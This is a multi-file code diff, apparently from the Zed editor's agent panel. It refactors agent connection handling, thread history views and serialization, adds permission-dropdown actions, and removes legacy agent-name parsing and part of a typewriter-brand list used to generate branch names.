text_thread_store: Entity<assistant_text_thread::TextThreadStore>,
prompt_store: Option<Entity<PromptStore>>,
+ connection_store: Entity<AgentConnectionStore>,
context_server_registry: Entity<ContextServerRegistry>,
configuration: Option<Entity<AgentConfiguration>>,
configuration_subscription: Option<Subscription>,
focus_handle: FocusHandle,
active_view: ActiveView,
previous_view: Option<ActiveView>,
- background_threads: HashMap<acp::SessionId, Entity<ConnectionView>>,
+ background_threads: HashMap<acp::SessionId, Entity<ConversationView>>,
new_thread_menu_handle: PopoverMenuHandle<ContextMenu>,
start_thread_in_menu_handle: PopoverMenuHandle<ContextMenu>,
agent_panel_menu_handle: PopoverMenuHandle<ContextMenu>,
@@ -642,7 +748,7 @@ pub struct AgentPanel {
zoomed: bool,
pending_serialization: Option<Task<Result<()>>>,
onboarding: Entity<AgentPanelOnboarding>,
- selected_agent: AgentType,
+ selected_agent_type: AgentType,
start_thread_in: StartThreadIn,
worktree_creation_status: Option<WorktreeCreationStatus>,
_thread_view_subscription: Option<Subscription>,
@@ -661,33 +767,32 @@ impl AgentPanel {
};
let width = self.width;
- let selected_agent = self.selected_agent.clone();
+ let selected_agent_type = self.selected_agent_type.clone();
let start_thread_in = Some(self.start_thread_in);
let last_active_thread = self.active_agent_thread(cx).map(|thread| {
let thread = thread.read(cx);
let title = thread.title();
+ let work_dirs = thread.work_dirs().cloned();
SerializedActiveThread {
session_id: thread.session_id().0.to_string(),
- agent_type: self.selected_agent.clone(),
- title: if title.as_ref() != DEFAULT_THREAD_TITLE {
- Some(title.to_string())
- } else {
- None
- },
- cwd: None,
+ agent_type: self.selected_agent_type.clone(),
+ title: title.map(|t| t.to_string()),
+ work_dirs: work_dirs.map(|dirs| dirs.serialize()),
}
});
+ let kvp = KeyValueStore::global(cx);
self.pending_serialization = Some(cx.background_spawn(async move {
save_serialized_panel(
workspace_id,
SerializedAgentPanel {
width,
- selected_agent: Some(selected_agent),
+ selected_agent: Some(selected_agent_type),
last_active_thread,
start_thread_in,
},
+ kvp,
)
.await?;
anyhow::Ok(())
@@ -700,6 +805,7 @@ impl AgentPanel {
mut cx: AsyncWindowContext,
) -> Task<Result<Entity<Self>>> {
let prompt_store = cx.update(|_window, cx| PromptStore::global(cx));
+ let kvp = cx.update(|_window, cx| KeyValueStore::global(cx)).ok();
cx.spawn(async move |cx| {
let prompt_store = match prompt_store {
Ok(prompt_store) => prompt_store.await.ok(),
@@ -712,9 +818,11 @@ impl AgentPanel {
let serialized_panel = cx
.background_spawn(async move {
- workspace_id
- .and_then(read_serialized_panel)
- .or_else(read_legacy_serialized_panel)
+ kvp.and_then(|kvp| {
+ workspace_id
+ .and_then(|id| read_serialized_panel(id, &kvp))
+ .or_else(|| read_legacy_serialized_panel(&kvp))
+ })
})
.await;
@@ -733,7 +841,7 @@ impl AgentPanel {
let last_active_thread = if let Some(thread_info) = serialized_panel
.as_ref()
- .and_then(|p| p.last_active_thread.clone())
+ .and_then(|p| p.last_active_thread.as_ref())
{
if thread_info.agent_type.is_native() {
let session_id = acp::SessionId::new(thread_info.session_id.clone());
@@ -770,7 +878,7 @@ impl AgentPanel {
panel.update(cx, |panel, cx| {
panel.width = serialized_panel.width.map(|w| w.round());
if let Some(selected_agent) = serialized_panel.selected_agent.clone() {
- panel.selected_agent = selected_agent;
+ panel.selected_agent_type = selected_agent;
}
if let Some(start_thread_in) = serialized_panel.start_thread_in {
let is_worktree_flag_enabled =
@@ -798,8 +906,18 @@ impl AgentPanel {
if let Some(thread_info) = last_active_thread {
let agent_type = thread_info.agent_type.clone();
panel.update(cx, |panel, cx| {
- panel.selected_agent = agent_type;
- panel.load_agent_thread_inner(thread_info.session_id.into(), thread_info.cwd, thread_info.title.map(SharedString::from), false, window, cx);
+ panel.selected_agent_type = agent_type;
+ if let Some(agent) = panel.selected_agent() {
+ panel.load_agent_thread(
+ agent,
+ thread_info.session_id.clone().into(),
+ thread_info.work_dirs.as_ref().map(|dirs| PathList::deserialize(dirs)),
+ thread_info.title.as_ref().map(|t| t.clone().into()),
+ false,
+ window,
+ cx,
+ );
+ }
});
}
panel
@@ -828,25 +946,9 @@ impl AgentPanel {
cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx));
let thread_store = ThreadStore::global(cx);
- let acp_history = cx.new(|cx| ThreadHistory::new(None, window, cx));
let text_thread_history =
cx.new(|cx| TextThreadHistory::new(text_thread_store.clone(), window, cx));
- cx.subscribe_in(
- &acp_history,
- window,
- |this, _, event, window, cx| match event {
- ThreadHistoryEvent::Open(thread) => {
- this.load_agent_thread(
- thread.session_id.clone(),
- thread.cwd.clone(),
- thread.title.clone(),
- window,
- cx,
- );
- }
- },
- )
- .detach();
+
cx.subscribe_in(
&text_thread_history,
window,
@@ -866,15 +968,18 @@ impl AgentPanel {
window.defer(cx, move |window, cx| {
let panel = weak_panel.clone();
let agent_navigation_menu =
- ContextMenu::build_persistent(window, cx, move |mut menu, _window, cx| {
+ ContextMenu::build_persistent(window, cx, move |mut menu, window, cx| {
if let Some(panel) = panel.upgrade() {
- if let Some(kind) = panel.read(cx).history_kind_for_selected_agent(cx) {
- menu =
- Self::populate_recently_updated_menu_section(menu, panel, kind, cx);
- let view_all_label = match kind {
- HistoryKind::AgentThreads => "View All",
- HistoryKind::TextThreads => "View All Text Threads",
+ if let Some(history) = panel
+ .update(cx, |panel, cx| panel.history_for_selected_agent(window, cx))
+ {
+ let view_all_label = match history {
+ History::AgentThreads { .. } => "View All",
+ History::TextThreads => "View All Text Threads",
};
+ menu = Self::populate_recently_updated_menu_section(
+ menu, panel, history, cx,
+ );
menu = menu.action(view_all_label, Box::new(OpenHistory));
}
}
@@ -940,6 +1045,17 @@ impl AgentPanel {
None
};
+ let connection_store = cx.new(|cx| {
+ let mut store = AgentConnectionStore::new(project.clone(), cx);
+ // Register the native agent right away, so that it is available for
+ // the inline assistant etc.
+ store.request_connection(
+ Agent::NativeAgent,
+ Agent::NativeAgent.server(fs.clone(), thread_store.clone()),
+ cx,
+ );
+ store
+ });
let mut panel = Self {
workspace_id,
active_view,
@@ -950,6 +1066,7 @@ impl AgentPanel {
language_registry,
text_thread_store,
prompt_store,
+ connection_store,
configuration: None,
configuration_subscription: None,
focus_handle: cx.focus_handle(),
@@ -967,10 +1084,9 @@ impl AgentPanel {
zoomed: false,
pending_serialization: None,
onboarding,
- acp_history,
text_thread_history,
thread_store,
- selected_agent: AgentType::default(),
+ selected_agent_type: AgentType::default(),
start_thread_in: StartThreadIn::default(),
worktree_creation_status: None,
_thread_view_subscription: None,
@@ -978,7 +1094,7 @@ impl AgentPanel {
_worktree_creation_task: None,
show_trust_workspace_message: false,
last_configuration_error_telemetry: None,
- on_boarding_upsell_dismissed: AtomicBool::new(OnboardingUpsell::dismissed()),
+ on_boarding_upsell_dismissed: AtomicBool::new(OnboardingUpsell::dismissed(cx)),
_active_view_observation: None,
};
@@ -1025,22 +1141,22 @@ impl AgentPanel {
&self.thread_store
}
- pub fn history(&self) -> &Entity<ThreadHistory> {
- &self.acp_history
+ pub fn connection_store(&self) -> &Entity<AgentConnectionStore> {
+ &self.connection_store
}
pub fn open_thread(
&mut self,
session_id: acp::SessionId,
- cwd: Option<PathBuf>,
+ work_dirs: Option<PathList>,
title: Option<SharedString>,
window: &mut Window,
cx: &mut Context<Self>,
) {
self.external_thread(
- Some(crate::ExternalAgent::NativeAgent),
+ Some(crate::Agent::NativeAgent),
Some(session_id),
- cwd,
+ work_dirs,
title,
None,
true,
@@ -1070,16 +1186,6 @@ impl AgentPanel {
.unwrap_or(false)
}
- pub fn active_connection_view(&self) -> Option<&Entity<ConnectionView>> {
- match &self.active_view {
- ActiveView::AgentThread { server_view, .. } => Some(server_view),
- ActiveView::Uninitialized
- | ActiveView::TextThread { .. }
- | ActiveView::History { .. }
- | ActiveView::Configuration => None,
- }
- }
-
pub fn new_thread(&mut self, _action: &NewThread, window: &mut Window, cx: &mut Context<Self>) {
self.new_agent_thread(AgentType::NativeAgent, window, cx);
}
@@ -1090,27 +1196,42 @@ impl AgentPanel {
window: &mut Window,
cx: &mut Context<Self>,
) {
- let Some(thread) = self
- .acp_history
+ let session_id = action.from_session_id.clone();
+
+ let Some(history) = self
+ .connection_store
.read(cx)
- .session_for_id(&action.from_session_id)
+ .entry(&Agent::NativeAgent)
+ .and_then(|e| e.read(cx).history().cloned())
else {
+ debug_panic!("Native agent is not registered");
return;
};
- self.external_thread(
- Some(ExternalAgent::NativeAgent),
- None,
- None,
- None,
- Some(AgentInitialContent::ThreadSummary {
- session_id: thread.session_id,
- title: thread.title,
- }),
- true,
- window,
- cx,
- );
+ cx.spawn_in(window, async move |this, cx| {
+ this.update_in(cx, |this, window, cx| {
+ let thread = history
+ .read(cx)
+ .session_for_id(&session_id)
+ .context("Session not found")?;
+
+ this.external_thread(
+ Some(Agent::NativeAgent),
+ None,
+ None,
+ None,
+ Some(AgentInitialContent::ThreadSummary {
+ session_id: thread.session_id,
+ title: thread.title,
+ }),
+ true,
+ window,
+ cx,
+ );
+ anyhow::Ok(())
+ })
+ })
+ .detach_and_log_err(cx);
}
fn new_text_thread(&mut self, window: &mut Window, cx: &mut Context<Self>) {
@@ -1137,8 +1258,8 @@ impl AgentPanel {
editor
});
- if self.selected_agent != AgentType::TextThread {
- self.selected_agent = AgentType::TextThread;
+ if self.selected_agent_type != AgentType::TextThread {
+ self.selected_agent_type = AgentType::TextThread;
self.serialize(cx);
}
@@ -1158,9 +1279,9 @@ impl AgentPanel {
fn external_thread(
&mut self,
- agent_choice: Option<crate::ExternalAgent>,
+ agent_choice: Option<crate::Agent>,
resume_session_id: Option<acp::SessionId>,
- cwd: Option<PathBuf>,
+ work_dirs: Option<PathList>,
title: Option<SharedString>,
initial_content: Option<AgentInitialContent>,
focus: bool,
@@ -1176,20 +1297,21 @@ impl AgentPanel {
#[derive(Serialize, Deserialize)]
struct LastUsedExternalAgent {
- agent: crate::ExternalAgent,
+ agent: crate::Agent,
}
let thread_store = self.thread_store.clone();
+ let kvp = KeyValueStore::global(cx);
if let Some(agent) = agent_choice {
cx.background_spawn({
let agent = agent.clone();
+ let kvp = kvp;
async move {
if let Some(serialized) =
serde_json::to_string(&LastUsedExternalAgent { agent }).log_err()
{
- KEY_VALUE_STORE
- .write_kvp(LAST_USED_EXTERNAL_AGENT_KEY.to_string(), serialized)
+ kvp.write_kvp(LAST_USED_EXTERNAL_AGENT_KEY.to_string(), serialized)
.await
.log_err();
}
@@ -1198,10 +1320,10 @@ impl AgentPanel {
.detach();
let server = agent.server(fs, thread_store);
- self.create_external_thread(
+ self.create_agent_thread(
server,
resume_session_id,
- cwd,
+ work_dirs,
title,
initial_content,
workspace,
@@ -1214,27 +1336,25 @@ impl AgentPanel {
} else {
cx.spawn_in(window, async move |this, cx| {
let ext_agent = if is_via_collab {
- ExternalAgent::NativeAgent
+ Agent::NativeAgent
} else {
- cx.background_spawn(async move {
- KEY_VALUE_STORE.read_kvp(LAST_USED_EXTERNAL_AGENT_KEY)
- })
- .await
- .log_err()
- .flatten()
- .and_then(|value| {
- serde_json::from_str::<LastUsedExternalAgent>(&value).log_err()
- })
- .map(|agent| agent.agent)
- .unwrap_or(ExternalAgent::NativeAgent)
+ cx.background_spawn(async move { kvp.read_kvp(LAST_USED_EXTERNAL_AGENT_KEY) })
+ .await
+ .log_err()
+ .flatten()
+ .and_then(|value| {
+ serde_json::from_str::<LastUsedExternalAgent>(&value).log_err()
+ })
+ .map(|agent| agent.agent)
+ .unwrap_or(Agent::NativeAgent)
};
let server = ext_agent.server(fs, thread_store);
this.update_in(cx, |agent_panel, window, cx| {
- agent_panel.create_external_thread(
+ agent_panel.create_agent_thread(
server,
resume_session_id,
- cwd,
+ work_dirs,
title,
initial_content,
workspace,
@@ -1277,11 +1397,11 @@ impl AgentPanel {
}
fn expand_message_editor(&mut self, window: &mut Window, cx: &mut Context<Self>) {
- let Some(thread_view) = self.active_connection_view() else {
+ let Some(conversation_view) = self.active_conversation_view() else {
return;
};
- let Some(active_thread) = thread_view.read(cx).active_thread().cloned() else {
+ let Some(active_thread) = conversation_view.read(cx).active_thread().cloned() else {
return;
};
@@ -1291,27 +1411,94 @@ impl AgentPanel {
})
}
- fn history_kind_for_selected_agent(&self, cx: &App) -> Option<HistoryKind> {
- match self.selected_agent {
- AgentType::NativeAgent => Some(HistoryKind::AgentThreads),
- AgentType::TextThread => Some(HistoryKind::TextThreads),
- AgentType::Custom { .. } => {
- if self.acp_history.read(cx).has_session_list() {
- Some(HistoryKind::AgentThreads)
- } else {
- None
- }
+ fn has_history_for_selected_agent(&self, cx: &App) -> bool {
+ match &self.selected_agent_type {
+ AgentType::TextThread | AgentType::NativeAgent => true,
+ AgentType::Custom { id } => {
+ let agent = Agent::Custom { id: id.clone() };
+ self.connection_store
+ .read(cx)
+ .entry(&agent)
+ .map_or(false, |entry| entry.read(cx).history().is_some())
+ }
+ }
+ }
+
+ fn history_for_selected_agent(
+ &self,
+ window: &mut Window,
+ cx: &mut Context<Self>,
+ ) -> Option<History> {
+ match &self.selected_agent_type {
+ AgentType::TextThread => Some(History::TextThreads),
+ AgentType::NativeAgent => {
+ let history = self
+ .connection_store
+ .read(cx)
+ .entry(&Agent::NativeAgent)?
+ .read(cx)
+ .history()?
+ .clone();
+
+ Some(History::AgentThreads {
+ view: self.create_thread_history_view(Agent::NativeAgent, history, window, cx),
+ })
+ }
+ AgentType::Custom { id, .. } => {
+ let agent = Agent::Custom { id: id.clone() };
+ let history = self
+ .connection_store
+ .read(cx)
+ .entry(&agent)?
+ .read(cx)
+ .history()?
+ .clone();
+ Some(History::AgentThreads {
+ view: self.create_thread_history_view(agent, history, window, cx),
+ })
}
}
}
+ fn create_thread_history_view(
+ &self,
+ agent: Agent,
+ history: Entity<ThreadHistory>,
+ window: &mut Window,
+ cx: &mut Context<Self>,
+ ) -> Entity<ThreadHistoryView> {
+ let view = cx.new(|cx| ThreadHistoryView::new(history.clone(), window, cx));
+ cx.subscribe_in(
+ &view,
+ window,
+ move |this, _, event, window, cx| match event {
+ ThreadHistoryViewEvent::Open(thread) => {
+ this.load_agent_thread(
+ agent.clone(),
+ thread.session_id.clone(),
+ thread.work_dirs.clone(),
+ thread.title.clone(),
+ true,
+ window,
+ cx,
+ );
+ }
+ },
+ )
+ .detach();
+ view
+ }
+
fn open_history(&mut self, window: &mut Window, cx: &mut Context<Self>) {
- let Some(kind) = self.history_kind_for_selected_agent(cx) else {
+ let Some(history) = self.history_for_selected_agent(window, cx) else {
return;
};
- if let ActiveView::History { kind: active_kind } = self.active_view {
- if active_kind == kind {
+ if let ActiveView::History {
+ history: active_history,
+ } = &self.active_view
+ {
+ if active_history == &history {
if let Some(previous_view) = self.previous_view.take() {
self.set_active_view(previous_view, true, window, cx);
}
@@ -403,6 +403,22 @@ impl AgentRegistryPage {
})
});
+ let website_button = agent.website().map(|website| {
+ let website = website.clone();
+ let website_for_click = website.clone();
+ IconButton::new(
+ SharedString::from(format!("agent-website-{}", agent.id())),
+ IconName::Link,
+ )
+ .icon_size(IconSize::Small)
+ .tooltip(move |_, cx| {
+ Tooltip::with_meta("Visit Agent Website", None, website.clone(), cx)
+ })
+ .on_click(move |_, _, cx| {
+ cx.open_url(&website_for_click);
+ })
+ });
+
AgentRegistryCard::new()
.child(
h_flex()
@@ -441,7 +457,8 @@ impl AgentRegistryPage {
.color(Color::Muted)
.truncate(),
)
- .when_some(repository_button, |this, button| this.child(button)),
+ .when_some(repository_button, |this, button| this.child(button))
+ .when_some(website_button, |this, button| this.child(button)),
),
)
}
@@ -467,10 +484,11 @@ impl AgentRegistryPage {
let agent_id = agent.id().to_string();
Button::new(button_id, "Install")
.style(ButtonStyle::Tinted(ui::TintColor::Accent))
- .icon(IconName::Download)
- .icon_size(IconSize::Small)
- .icon_color(Color::Muted)
- .icon_position(IconPosition::Start)
+ .start_icon(
+ Icon::new(IconName::Download)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.on_click(move |_, _, cx| {
let agent_id = agent_id.clone();
update_settings_file(fs.clone(), cx, move |settings, _| {
@@ -541,9 +559,11 @@ impl Render for AgentRegistryPage {
Button::new("learn-more", "Learn More")
.style(ButtonStyle::Outlined)
.size(ButtonSize::Medium)
- .icon(IconName::ArrowUpRight)
- .icon_color(Color::Muted)
- .icon_size(IconSize::Small)
+ .end_icon(
+ Icon::new(IconName::ArrowUpRight)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.on_click(move |_, _, cx| {
cx.open_url(&zed_urls::acp_registry_blog(cx))
}),
@@ -1,4 +1,5 @@
mod agent_configuration;
+pub(crate) mod agent_connection_store;
mod agent_diff;
mod agent_model_selector;
mod agent_panel;
@@ -7,9 +8,9 @@ mod branch_names;
mod buffer_codegen;
mod completion_provider;
mod config_options;
-pub(crate) mod connection_view;
mod context;
mod context_server_configuration;
+pub(crate) mod conversation_view;
mod entry_view_state;
mod external_source_prompt;
mod favorite_models;
@@ -31,6 +32,9 @@ pub mod test_support;
mod text_thread_editor;
mod text_thread_history;
mod thread_history;
+mod thread_history_view;
+pub mod thread_metadata_store;
+pub mod threads_archive_view;
mod ui;
use std::rc::Rc;
@@ -43,7 +47,7 @@ use client::Client;
use command_palette_hooks::CommandPaletteFilter;
use feature_flags::{AgentV2FeatureFlag, FeatureFlagAppExt as _};
use fs::Fs;
-use gpui::{Action, App, Context, Entity, SharedString, Window, actions};
+use gpui::{Action, App, Context, Entity, SharedString, UpdateGlobal, Window, actions};
use language::{
LanguageRegistry,
language_settings::{AllLanguageSettings, EditPredictionProvider},
@@ -51,11 +55,11 @@ use language::{
use language_model::{
ConfiguredModel, LanguageModelId, LanguageModelProviderId, LanguageModelRegistry,
};
-use project::DisableAiSettings;
+use project::{AgentId, DisableAiSettings};
use prompt_store::PromptBuilder;
use schemars::JsonSchema;
use serde::{Deserialize, Serialize};
-use settings::{LanguageModelSelection, Settings as _, SettingsStore};
+use settings::{DockPosition, DockSide, LanguageModelSelection, Settings as _, SettingsStore};
use std::any::TypeId;
use workspace::Workspace;
@@ -66,15 +70,18 @@ pub use crate::agent_panel::{
use crate::agent_registry_ui::AgentRegistryPage;
pub use crate::inline_assistant::InlineAssistant;
pub use agent_diff::{AgentDiffPane, AgentDiffToolbar};
-pub(crate) use connection_view::ConnectionView;
+pub(crate) use conversation_view::ConversationView;
pub use external_source_prompt::ExternalSourcePrompt;
pub(crate) use mode_selector::ModeSelector;
pub(crate) use model_selector::ModelSelector;
pub(crate) use model_selector_popover::ModelSelectorPopover;
pub use text_thread_editor::{AgentPanelDelegate, TextThreadEditor};
-pub(crate) use thread_history::*;
+pub(crate) use thread_history::ThreadHistory;
+pub(crate) use thread_history_view::*;
use zed_actions;
+pub const DEFAULT_THREAD_TITLE: &str = "New Thread";
+
actions!(
agent,
[
@@ -82,8 +89,8 @@ actions!(
NewTextThread,
/// Toggles the menu to create new agent threads.
ToggleNewThreadMenu,
- /// Toggles the selector for choosing where new threads start (current project or new worktree).
- ToggleStartThreadInSelector,
+ /// Cycles through the options for where new threads start (current project or new worktree).
+ CycleStartThreadIn,
/// Toggles the navigation menu for switching between threads and views.
ToggleNavigationMenu,
/// Toggles the options menu for agent settings and preferences.
@@ -189,6 +196,29 @@ pub struct AuthorizeToolCall {
pub option_kind: String,
}
+/// Action to select a permission granularity option from the dropdown.
+/// This updates the selected granularity without triggering authorization.
+#[derive(Clone, PartialEq, Deserialize, JsonSchema, Action)]
+#[action(namespace = agent)]
+#[serde(deny_unknown_fields)]
+pub struct SelectPermissionGranularity {
+ /// The tool call ID for which to select the granularity.
+ pub tool_call_id: String,
+ /// The index of the selected granularity option.
+ pub index: usize,
+}
+
+/// Action to toggle a command pattern checkbox in the permission dropdown.
+#[derive(Clone, PartialEq, Deserialize, JsonSchema, Action)]
+#[action(namespace = agent)]
+#[serde(deny_unknown_fields)]
+pub struct ToggleCommandPattern {
+ /// The tool call ID for which to toggle the pattern.
+ pub tool_call_id: String,
+ /// The index of the command pattern to toggle.
+ pub pattern_index: usize,
+}
+
/// Creates a new conversation thread, optionally based on an existing thread.
#[derive(Default, Clone, PartialEq, Deserialize, JsonSchema, Action)]
#[action(namespace = agent)]
@@ -201,7 +231,7 @@ pub struct NewThread;
#[serde(deny_unknown_fields)]
pub struct NewExternalAgentThread {
/// Which agent to use for the conversation.
- agent: Option<ExternalAgent>,
+ agent: Option<Agent>,
}
#[derive(Clone, PartialEq, Deserialize, JsonSchema, Action)]
@@ -212,71 +242,24 @@ pub struct NewNativeAgentThreadFromSummary {
}
// TODO unify this with AgentType
-#[derive(Debug, Clone, PartialEq, Serialize, JsonSchema)]
+#[derive(Debug, Clone, PartialEq, Eq, Hash, Serialize, Deserialize, JsonSchema)]
#[serde(rename_all = "snake_case")]
-pub enum ExternalAgent {
+pub enum Agent {
NativeAgent,
- Custom { name: SharedString },
+ Custom {
+ #[serde(rename = "name")]
+ id: AgentId,
+ },
}
-// Custom impl handles legacy variant names from before the built-in agents were moved to
-// the registry: "claude_code" -> Custom { name: "claude-acp" }, "codex" -> Custom { name:
-// "codex-acp" }, "gemini" -> Custom { name: "gemini" }.
-// Can be removed at some point in the future and go back to #[derive(Deserialize)].
-impl<'de> serde::Deserialize<'de> for ExternalAgent {
- fn deserialize<D>(deserializer: D) -> Result<Self, D::Error>
- where
- D: serde::Deserializer<'de>,
- {
- use project::agent_server_store::{CLAUDE_AGENT_NAME, CODEX_NAME, GEMINI_NAME};
-
- let value = serde_json::Value::deserialize(deserializer)?;
-
- if let Some(s) = value.as_str() {
- return match s {
- "native_agent" => Ok(Self::NativeAgent),
- "claude_code" | "claude_agent" => Ok(Self::Custom {
- name: CLAUDE_AGENT_NAME.into(),
- }),
- "codex" => Ok(Self::Custom {
- name: CODEX_NAME.into(),
- }),
- "gemini" => Ok(Self::Custom {
- name: GEMINI_NAME.into(),
- }),
- other => Err(serde::de::Error::unknown_variant(
- other,
- &[
- "native_agent",
- "custom",
- "claude_agent",
- "claude_code",
- "codex",
- "gemini",
- ],
- )),
- };
- }
-
- if let Some(obj) = value.as_object() {
- if let Some(inner) = obj.get("custom") {
- #[derive(serde::Deserialize)]
- struct CustomFields {
- name: SharedString,
- }
- let fields: CustomFields =
- serde_json::from_value(inner.clone()).map_err(serde::de::Error::custom)?;
- return Ok(Self::Custom { name: fields.name });
- }
+impl Agent {
+ pub fn id(&self) -> AgentId {
+ match self {
+ Self::NativeAgent => agent::ZED_AGENT_ID.clone(),
+ Self::Custom { id } => id.clone(),
}
-
- Err(serde::de::Error::custom(
- "expected a string variant or {\"custom\": {\"name\": ...}}",
- ))
}
-}
-impl ExternalAgent {
pub fn server(
&self,
fs: Arc<dyn fs::Fs>,
@@ -284,7 +267,9 @@ impl ExternalAgent {
) -> Rc<dyn agent_servers::AgentServer> {
match self {
Self::NativeAgent => Rc::new(agent::NativeAgentServer::new(fs, thread_store)),
- Self::Custom { name } => Rc::new(agent_servers::CustomAgentServer::new(name.clone())),
+ Self::Custom { id: name } => {
+ Rc::new(agent_servers::CustomAgentServer::new(name.clone()))
+ }
}
}
}
@@ -373,6 +358,7 @@ pub fn init(
agent_panel::init(cx);
context_server_configuration::init(language_registry.clone(), fs.clone(), cx);
TextThreadEditor::init(cx);
+ thread_metadata_store::init(cx);
register_slash_commands(cx);
inline_assistant::init(fs.clone(), prompt_builder.clone(), cx);
@@ -429,6 +415,31 @@ pub fn init(
update_command_palette_filter(cx);
})
.detach();
+
+ cx.observe_flag::<AgentV2FeatureFlag, _>(|is_enabled, cx| {
+ SettingsStore::update_global(cx, |store, cx| {
+ store.update_default_settings(cx, |defaults| {
+ if is_enabled {
+ defaults.agent.get_or_insert_default().dock = Some(DockPosition::Left);
+ defaults.project_panel.get_or_insert_default().dock = Some(DockSide::Right);
+ defaults.outline_panel.get_or_insert_default().dock = Some(DockSide::Right);
+ defaults.collaboration_panel.get_or_insert_default().dock =
+ Some(DockPosition::Right);
+ defaults.git_panel.get_or_insert_default().dock = Some(DockPosition::Right);
+ defaults.notification_panel.get_or_insert_default().button = Some(false);
+ } else {
+ defaults.agent.get_or_insert_default().dock = Some(DockPosition::Right);
+ defaults.project_panel.get_or_insert_default().dock = Some(DockSide::Left);
+ defaults.outline_panel.get_or_insert_default().dock = Some(DockSide::Left);
+ defaults.collaboration_panel.get_or_insert_default().dock =
+ Some(DockPosition::Left);
+ defaults.git_panel.get_or_insert_default().dock = Some(DockPosition::Left);
+ defaults.notification_panel.get_or_insert_default().button = Some(true);
+ }
+ });
+ });
+ })
+ .detach();
}
fn update_command_palette_filter(cx: &mut App) {
@@ -651,6 +662,7 @@ mod tests {
message_editor_min_lines: 1,
tool_permissions: Default::default(),
show_turn_stats: false,
+ new_thread_location: Default::default(),
};
cx.update(|cx| {
@@ -744,39 +756,15 @@ mod tests {
}
#[test]
- fn test_deserialize_legacy_external_agent_variants() {
- use project::agent_server_store::{CLAUDE_AGENT_NAME, CODEX_NAME, GEMINI_NAME};
-
- assert_eq!(
- serde_json::from_str::<ExternalAgent>(r#""claude_code""#).unwrap(),
- ExternalAgent::Custom {
- name: CLAUDE_AGENT_NAME.into(),
- },
- );
- assert_eq!(
- serde_json::from_str::<ExternalAgent>(r#""codex""#).unwrap(),
- ExternalAgent::Custom {
- name: CODEX_NAME.into(),
- },
- );
- assert_eq!(
- serde_json::from_str::<ExternalAgent>(r#""gemini""#).unwrap(),
- ExternalAgent::Custom {
- name: GEMINI_NAME.into(),
- },
- );
- }
-
- #[test]
- fn test_deserialize_current_external_agent_variants() {
+ fn test_deserialize_external_agent_variants() {
assert_eq!(
- serde_json::from_str::<ExternalAgent>(r#""native_agent""#).unwrap(),
- ExternalAgent::NativeAgent,
+ serde_json::from_str::<Agent>(r#""native_agent""#).unwrap(),
+ Agent::NativeAgent,
);
assert_eq!(
- serde_json::from_str::<ExternalAgent>(r#"{"custom":{"name":"my-agent"}}"#).unwrap(),
- ExternalAgent::Custom {
- name: "my-agent".into(),
+ serde_json::from_str::<Agent>(r#"{"custom":{"name":"my-agent"}}"#).unwrap(),
+ Agent::Custom {
+ id: "my-agent".into(),
},
);
}
@@ -1,710 +1,77 @@
use collections::HashSet;
use rand::Rng;
-/// Names of historical typewriter brands, for use in auto-generated branch names.
-/// (Hyphens and parens have been dropped so that the branch names are one-word.)
-///
-/// Thanks to https://typewriterdatabase.com/alph.0.brands for the names!
-const TYPEWRITER_NAMES: &[&str] = &[
- "abeille",
- "acme",
- "addo",
- "adler",
- "adlerette",
- "adlerita",
- "admiral",
- "agamli",
- "agar",
- "agidel",
- "agil",
- "aguia",
- "aguila",
- "ahram",
- "aigle",
- "ajax",
- "aktiv",
- "ala",
- "alba",
- "albus",
- "alexander",
- "alexis",
- "alfa",
- "allen",
- "alonso",
- "alpina",
- "amata",
- "amaya",
- "amka",
- "anavi",
- "anderson",
- "andina",
- "antares",
- "apex",
- "apsco",
- "aquila",
- "archo",
- "ardita",
- "argyle",
- "aristocrat",
- "aristokrat",
- "arlington",
- "armstrong",
- "arpha",
- "artus",
- "astoria",
- "atlantia",
- "atlantic",
- "atlas",
- "augusta",
- "aurora",
- "austro",
- "automatic",
- "avanti",
- "avona",
- "azzurra",
- "bajnok",
- "baldwin",
- "balkan",
- "baltica",
- "baltimore",
- "barlock",
- "barr",
- "barrat",
- "bartholomew",
- "bashkiriya",
- "bavaria",
- "beaucourt",
- "beko",
- "belka",
- "bennett",
- "bennington",
- "berni",
- "bianca",
- "bijou",
- "bing",
- "bisei",
- "biser",
- "bluebird",
- "bolida",
- "borgo",
- "boston",
- "boyce",
- "bradford",
- "brandenburg",
- "brigitte",
- "briton",
- "brooks",
- "brosette",
- "buddy",
- "burns",
- "burroughs",
- "byron",
- "calanda",
- "caligraph",
- "cappel",
- "cardinal",
- "carissima",
- "carlem",
- "carlton",
- "carmen",
- "cawena",
- "cella",
- "celtic",
- "century",
- "champignon",
- "cherryland",
- "chevron",
- "chicago",
- "cicero",
- "cifra",
- "citizen",
- "claudia",
- "cleveland",
- "clover",
- "coffman",
- "cole",
- "columbia",
- "commercial",
- "companion",
- "concentra",
- "concord",
- "concordia",
- "conover",
- "constanta",
- "consul",
- "conta",
- "contenta",
- "contimat",
- "contina",
- "continento",
- "cornelia",
- "coronado",
- "cosmopolita",
- "courier",
- "craftamatic",
- "crandall",
- "crown",
- "culema",
- "dactyle",
- "dankers",
- "dart",
- "daugherty",
- "davis",
- "dayton",
- "dea",
- "delmar",
- "densmore",
- "depantio",
- "diadema",
- "dial",
- "diamant",
- "diana",
- "dictatype",
- "diplomat",
- "diskret",
- "dolfus",
- "dollar",
- "domus",
- "drake",
- "draper",
- "duplex",
- "durabel",
- "dynacord",
- "eagle",
- "eclipse",
- "edelmann",
- "edelweiss",
- "edison",
- "edita",
- "edland",
- "efka",
- "eldorado",
- "electa",
- "electromatic",
- "elektro",
- "elgin",
- "elliot",
- "emerson",
- "emka",
- "emona",
- "empire",
- "engadine",
- "engler",
- "erfurt",
- "erika",
- "esko",
- "essex",
- "eureka",
- "europa",
- "everest",
- "everlux",
- "excelsior",
- "express",
- "fabers",
- "facit",
- "fairbanks",
- "faktotum",
- "famos",
- "federal",
- "felio",
- "fidat",
- "filius",
- "fips",
- "fish",
- "fitch",
- "fleet",
- "florida",
- "flott",
- "flyer",
- "flying",
- "fontana",
- "ford",
- "forto",
- "fortuna",
- "fox",
- "framo",
- "franconia",
- "franklin",
- "friden",
- "frolio",
- "furstenberg",
- "galesburg",
- "galiette",
- "gallia",
- "garbell",
- "gardner",
- "geka",
- "generation",
- "genia",
- "geniatus",
- "gerda",
- "gisela",
- "glashutte",
- "gloria",
- "godrej",
- "gossen",
- "gourland",
- "grandjean",
